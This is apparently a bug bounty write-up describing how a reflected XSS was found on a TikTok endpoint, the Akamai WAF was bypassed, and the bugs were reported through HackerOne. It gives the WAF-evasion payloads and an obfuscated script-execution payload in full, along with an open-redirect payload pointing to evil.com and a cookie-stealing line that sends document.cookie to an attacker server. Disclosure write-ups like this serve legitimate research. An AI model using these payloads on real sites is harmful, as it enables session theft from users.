By skyforbes 
Featured
It was just another random night. A friend of mine asked me to hop on Valorant (Game) typical evening ritual.
But for some reason, I declined. I fired up my burpsuite instead and started poking around for bounties. Best decision ever.
Because that night, I found three bugs on TikTok that eventually earned me a total of $3,000.
The Recon Game
My journey started with simple recon. I used urlscan.io to scan for any endpoints related to TikTok’s domains. After a bit of digging, I ended up with a massive list roughly 10,000 URLs.
Scrolling through manually (yes, manually), I spotted an endpoint under a path that looked like a campaign sharing feature. The URL had several parameters attached to it which immediately triggered my curiosity. (Can’t share full endpoint)
I began playing with the region parameter. To test reflection, I threw in this harmless payload:
?region=id'"><u>testest</u>
And guess what?
It reflected cleanly. No sanitization. No encoding.
Enter the WAF — Akamai
I thought to myself, “Okay… this might be interesting.” So I tested with a classic payload:
"><img src=x onerror=alert(document.domain)>
Blocked by Akamai TikTok’s WAF. And not just any WAF… a hard one.
Game on.
The Bypass Attempts
I started digging into Akamai WAF bypass techniques. Found some cool articles talking about string obfuscation, case sensitivity, and tag evasion.
Some common attempts included:
</ScRiPt> → blocked
</SCRIPT> → blocked
</ScRpt> → not blocked, but also invalid
</Script+xxx> → bypassed briefly, but eventually got filtered again
I knew I needed something more creative.
Payload Evolution
After multiple failed tries, I came up with this weird-looking but effective bypass string:
}<x>xxx<!--><!>+>+></Script+xxx></script%20x></x><x>xxx<!--><!>+>+>
This bypassed filtering but alert(), confirm(), and prompt() were all blocked at runtime. So I played it safe and reported the bug first, using an open redirect payload to avoid potential duplicate submissions.
The full payload was a bit wild, and looked something like this:
}<x>xxx<!--><!>+>+></Script+xxx><Script+xxx>Object.prototype.BOOMR = 1;
Object.prototype.url = 'https://portswigger-labs.net/xss/xss.js';
location.replace('https://evil.com');</script%20x></x><x>xxx<!--><!>+>+>
Two days later, I got a response from HackerOne Triage:
Crafting a Real XSS
I went back to the drawing board. Since direct alert() was blocked, I tried breaking it down using obfuscated access:
window/*xxx*/ ;
Full payload :
<x>xxx<!--><!>+>+></Script+xxx><script%20x>window/*xxx*/['al'%2b'ert'](1);//</script%20x></x><x>xxx<!--><!>+>+>
That worked. I updated my PoC and sent it again.
The Internal triage team replied:
Challenge accepted.
I moved on to stealing cookies using this final payload:
window/*xxx*/['loca' + 'tion'] = 'http://<your-server>?cookie=' + document/*xxx*/['coo' + 'kie'];
Boom. Valid XSS confirmed. On the same day later $1,000 reward dropped in.
Bonus Round: Two More Bugs
After this win, I continued digging through more endpoints in the same path family. Eventually, I found two more with identical vulnerabilities.
Same technique. Same XSS. Same reward: $1,000 each.
💸 The Final Tally
- First bug: $1,000
- Second bug: $1,000
- Third bug: $1,000
➡️ Total: $3,000
And I didn’t even need to playing Valorant that night.
Final Thoughts for Fellow Hackers
Bug bounty isn’t just about skills it’s about patience, recon, creativity, and timing. Sometimes, saying “no” to a game invite can land you a few thousand dollars richer 😂
To all the hunters out there: never underestimate a reflected parameter. The simplest bugs can lead to the most unexpected rewards if you know how to craft your payloads right.
Keep learning, stay safe.
Happy hacking.
./Logout.